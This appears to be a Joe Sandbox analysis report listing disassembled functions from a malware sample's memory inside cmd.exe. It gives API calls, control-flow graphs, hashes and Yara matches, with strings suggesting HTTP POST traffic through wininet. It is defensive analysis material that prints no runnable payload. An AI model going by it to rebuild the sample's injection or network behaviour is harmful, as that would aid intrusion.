                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 91c05152a42f42ce2e24c57f04c23f5dba6412237fda5a1d109ddf089fbbfee1
                                                                                                                                            • Instruction ID: 197d6c85a851f397c672e529eac3e5ef98e6b6e7418448e5812c7feb7bf71307
                                                                                                                                            • Opcode Fuzzy Hash: 91c05152a42f42ce2e24c57f04c23f5dba6412237fda5a1d109ddf089fbbfee1
                                                                                                                                            • Instruction Fuzzy Hash: 4790027120169C42D111B158840574A040587D0701F5AC411A442C658D8B9589917121
                                                                                                                                            Function 03C135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 1f34f8e5bbbc334441f1c993150fbb6099bc4910c1218606ae1d99af3b7fb301
                                                                                                                                            • Instruction ID: 4d300d48d0472e5aa5d0fa7ba3120ede5bcfa304fbcf28cb067fd859ca536629
                                                                                                                                            • Opcode Fuzzy Hash: 1f34f8e5bbbc334441f1c993150fbb6099bc4910c1218606ae1d99af3b7fb301
                                                                                                                                            • Instruction Fuzzy Hash: 6690027160571842D101B1584515706140587D0601F66C411A042C568D8B958A5165A2
                                                                                                                                            Function 02F79039 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 100sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 412 2f79039-2f7903b 413 2f79012-2f79035 call 2f7ab90 * 2 412->413 414 2f7903d-2f79082 call 2f7bd00 412->414 422 2f7915c-2f79162 414->422 423 2f79088-2f790d8 call 2f7bdd0 call 2f6ace0 call 2f74e40 414->423 433 2f790e0-2f790f1 Sleep 423->433 434 2f79156-2f7915a 433->434 435 2f790f3-2f790f9 433->435 434->422 434->433 436 2f79123-2f79144 call 2f78e70 435->436 437 2f790fb-2f79121 call 2f78c60 435->437 441 2f79149-2f7914c 436->441 437->441 441->434
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02F790E8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: POST$net.dll$wininet.dll
                                                                                                                                            • API String ID: 3472027048-3140911592
                                                                                                                                            • Opcode ID: 34c9eb0dab7251759c49eff9c24ecd8a4c61c220e872b4a7ab5ab60c4733c7e8
                                                                                                                                            • Instruction ID: 361511d0f4b4d1a510636d522afeee1bd82d02d994592a4ff24abb6d01c7fe91
                                                                                                                                            • Opcode Fuzzy Hash: 34c9eb0dab7251759c49eff9c24ecd8a4c61c220e872b4a7ab5ab60c4733c7e8
                                                                                                                                            • Instruction Fuzzy Hash: F831C1B2A00304AFD714EF68DC85FABB7B9FF48B44F00815AE6195B241D7B4A520CBA5
                                                                                                                                            Function 02F79040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 442 2f79040-2f79082 call 2f7bd00 445 2f7915c-2f79162 442->445 446 2f79088-2f790d8 call 2f7bdd0 call 2f6ace0 call 2f74e40 442->446 453 2f790e0-2f790f1 Sleep 446->453 454 2f79156-2f7915a 453->454 455 2f790f3-2f790f9 453->455 454->445 454->453 456 2f79123-2f79144 call 2f78e70 455->456 457 2f790fb-2f79121 call 2f78c60 455->457 461 2f79149-2f7914c 456->461 457->461 461->454
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02F790E8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                            • Opcode ID: 964e75058e19bee34e5a35c3c0312460f2476d776aa6c05d1c244d75a02e7c70
                                                                                                                                            • Instruction ID: 0ae9fd8bc91fb2a83455d7b0c4d60924360ddc184774311bb4a455005c5da05c
                                                                                                                                            • Opcode Fuzzy Hash: 964e75058e19bee34e5a35c3c0312460f2476d776aa6c05d1c244d75a02e7c70
                                                                                                                                            • Instruction Fuzzy Hash: 2C3170B2A00745BBD724DF64CC89F67B7B9BB48B41F00801EF62A6B244D770A560CBA4
                                                                                                                                            Function 02F7A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 568 2f7a630-2f7a661 call 2f7af20 RtlFreeHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63AF8), ref: 02F7A65D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID: .z`
                                                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                            • Instruction ID: f87cece2eab356ae95fa62d066573602cdf341cb3e197a3f68510ee7bc6dac76
                                                                                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                            • Instruction Fuzzy Hash: 1FE04FB22002046BD714DF59DC44EEB77ADEF88750F014555FE0857241C630F910CAF0
                                                                                                                                            Function 02F682D4 Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 571 2f682d4-2f682d8 572 2f68331-2f68343 call 2f6ace0 571->572 573 2f682da-2f682db 571->573 575 2f68347-2f6835a call 2f74e40 572->575 573->575 576 2f682dd-2f682e1 573->576 584 2f6838e-2f68392 575->584 585 2f6835c-2f6836e PostThreadMessageW 575->585 579 2f682eb-2f682fd call 2f7b710 576->579 580 2f682e6 call 2f7b860 576->580 580->579 586 2f68370-2f6838b call 2f6a470 PostThreadMessageW 585->586 587 2f6838d 585->587 586->587 587->584
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 512dd3507357014abebb50c711ebdeca414d1cbdda25bfc6efbcc436685c2841
                                                                                                                                            • Instruction ID: d4c6de7a8d60449dd3181dc0f805cbdaf3fcc381c6d86df3360b47def0f82056
                                                                                                                                            • Opcode Fuzzy Hash: 512dd3507357014abebb50c711ebdeca414d1cbdda25bfc6efbcc436685c2841
                                                                                                                                            • Instruction Fuzzy Hash: 21019C32A4022C7BE721AA609C06FFE7329EB44BD4F0D0169FF04FB181E651AC0A47E1
                                                                                                                                            Function 02F6830C Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 590 2f6830c-2f6831f 591 2f68328-2f6832d 590->591 592 2f68323 call 2f7be20 590->592 593 2f68333-2f6833d 591->593 594 2f6832e call 2f7c9c0 591->594 592->591 595 2f68343-2f6835a call 2f74e40 593->595 596 2f6833e call 2f6ace0 593->596 594->593 600 2f6838e-2f68392 595->600 601 2f6835c-2f6836e PostThreadMessageW 595->601 596->595 602 2f68370-2f6838b call 2f6a470 PostThreadMessageW 601->602 603 2f6838d 601->603 602->603 603->600
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: fd4eaedba8f0315b12c40caa6cae9680a79d730ce5e31a0ec9beee2701ef203e
                                                                                                                                            • Instruction ID: 57ba30f6c999a51925b3d33245eddc295f00383deacb585f086da0939577aefc
                                                                                                                                            • Opcode Fuzzy Hash: fd4eaedba8f0315b12c40caa6cae9680a79d730ce5e31a0ec9beee2701ef203e
                                                                                                                                            • Instruction Fuzzy Hash: D401F771A802287AE720A6948C02FFE7B2DAB01B95F08011AFF04FA1C1D6956A064BF1
                                                                                                                                            Function 02F68310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 606 2f68310-2f6832d call 2f7be20 609 2f68333-2f6833d 606->609 610 2f6832e call 2f7c9c0 606->610 611 2f68343-2f6835a call 2f74e40 609->611 612 2f6833e call 2f6ace0 609->612 610->609 616 2f6838e-2f68392 611->616 617 2f6835c-2f6836e PostThreadMessageW 611->617 612->611 618 2f68370-2f6838b call 2f6a470 PostThreadMessageW 617->618 619 2f6838d 617->619 618->619 619->616
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
                                                                                                                                            • Instruction ID: d9be37e5f731db5b8ce4e2a93dba63b2071f390c98c5f18f0872a02d19a310e3
                                                                                                                                            • Opcode Fuzzy Hash: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
                                                                                                                                            • Instruction Fuzzy Hash: 9001D671A8032877E720A6949C07FFF776DAB40BD0F080119FF04BA1C1E6A569064BF6
                                                                                                                                            Function 02F68393 Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 622 2f68393-2f68394 call 2f7c9c0 626 2f68343-2f6835a call 2f74e40 622->626 627 2f6833e call 2f6ace0 622->627 631 2f6838e-2f68392 626->631 632 2f6835c-2f6836e PostThreadMessageW 626->632 627->626 633 2f68370-2f6838b call 2f6a470 PostThreadMessageW 632->633 634 2f6838d 632->634 633->634 634->631
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F6836A
                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F6838B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                            • Opcode ID: 5cd1f6cc8f78c83971fb9e7fe69c7b0573676a1284d43a86887f8d6ee48ddf22
                                                                                                                                            • Instruction ID: 5c3b44297742c78b6c669f8ccf7d3a63e4c2c95872221cbe62da331a7acb82be
                                                                                                                                            • Opcode Fuzzy Hash: 5cd1f6cc8f78c83971fb9e7fe69c7b0573676a1284d43a86887f8d6ee48ddf22
                                                                                                                                            • Instruction Fuzzy Hash: 7BF0F672A8022877E7206A645C06FFF37299F41BD0F09455AFF44FF1C0D69669064AE5
                                                                                                                                            Function 02F6ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F6AD52
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                            • Instruction ID: 13af5e03ef168f434de02f5baddfa670a2c82f4f51bbd33bb45eb091d519bf8f
                                                                                                                                            • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                            • Instruction Fuzzy Hash: 13015EB5D0020DABDB10DAA0DD45FADB3B99F14348F1041A5EA09A7240FA30E714CB91
                                                                                                                                            Function 02F7A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F7A6F4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                            • Instruction ID: 2e61177c4555b60f1e27cce0c8b2bbfe49601191f342caa05065856500255aae
                                                                                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                            • Instruction Fuzzy Hash: A4015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97255D630E851CBA4
                                                                                                                                            Function 02F79170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6F040,?,?,00000000), ref: 02F791AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                                            • Instruction ID: cfe504f59c05317cdd9a6acea69d111c2d6fe0a080dc2d6d46e7c932eb1c8d61
                                                                                                                                            • Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                                            • Instruction Fuzzy Hash: 62E06D333902043AE220659DAC02FA7B39D8B91B60F540026FB0DEB6C0D5D5F40146A4
                                                                                                                                            Function 02F7A781 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6F1C2,02F6F1C2,?,00000000,?,?), ref: 02F7A7C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                            • Opcode ID: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
                                                                                                                                            • Instruction ID: 6d7aa2e578cf505396c203937d505f98e488da6d95dee398abb513575a94fa21
                                                                                                                                            • Opcode Fuzzy Hash: 168cac75de418dd5d78c3e1ea1901aa3c15827ab00108cf7070bcb5015934051
                                                                                                                                            • Instruction Fuzzy Hash: 7EF0E5B2200204ABDB14DF54DC85EDB33A9EF49354F118099F90D6B241C635A805CBB0
                                                                                                                                            Function 02F7A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6F1C2,02F6F1C2,?,00000000,?,?), ref: 02F7A7C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                            • Instruction ID: 75ed948eeea01032ae8cffd91dee8b21118287f7e20bf96ccfd2bfac2c049186
                                                                                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                            • Instruction Fuzzy Hash: D7E01AB22002086BDB10DF49DC84EEB37ADAF88650F018155FA0857241C930E8108BF5
                                                                                                                                            Function 02F7A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(02F74526,?,02F74C9F,02F74C9F,?,02F74526,?,?,?,?,?,00000000,00000000,?), ref: 02F7A61D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                            • Instruction ID: 7875a93f98d0008d92576a12455f04f8456e69a5bf7fd8626a7cade016814903
                                                                                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                            • Instruction Fuzzy Hash: 17E012B2200208ABDB14EF99DC40EAB77ADAF88654F118559FA085B281C630F9108AB0
                                                                                                                                            Function 02F6F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,02F68D14,?), ref: 02F6F6EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                            • Instruction ID: 7dc7791d81185e11b600ea05c4a3d98a5f24759e8d02d8857b15c552aa368018
                                                                                                                                            • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                            • Instruction Fuzzy Hash: B0D0A7727503043BE610FBA89C07F2733CD9B44B54F490074FA49D73C3D954E0004565
                                                                                                                                            Function 03C12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 6bb2a9554a4a3d041af04f76dfc2cbacb770ef6f48ffa141e6d9246769ba2458
                                                                                                                                            • Instruction ID: 4870a0da1a05c06da5554bc9bdcdd5c3d01eb0b63b632c31a1f43d1a663b3d06
                                                                                                                                            • Opcode Fuzzy Hash: 6bb2a9554a4a3d041af04f76dfc2cbacb770ef6f48ffa141e6d9246769ba2458
                                                                                                                                            • Instruction Fuzzy Hash: DAB09B719016D5C6EA11E76046097177D0467D1701F1AC461D303C641E4739C1D1F175

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 00248572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00248791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00246906,0000001F,?,00000080), ref: 00248791
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,0027C9E0,00000008), ref: 0024859E
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 002485BC
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00248614
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00248653
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0027C9D0,00000008), ref: 0024867D
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0027C970,00000020), ref: 00248698
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0027C930,00000020), ref: 002486B0
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0027C8F0,00000020), ref: 002486C8
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0027C8B0,00000020), ref: 002486E0
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0027C870,00000020), ref: 002486F8
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0027C830,00000020), ref: 00248710
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0027C7F0,00000020), ref: 00248728
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0027C9C0,00000008), ref: 00248743
                                                                                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0027C9B0,00000008), ref: 0024875B
                                                                                                                                            • setlocale.MSVCRT ref: 00248770
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                            • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
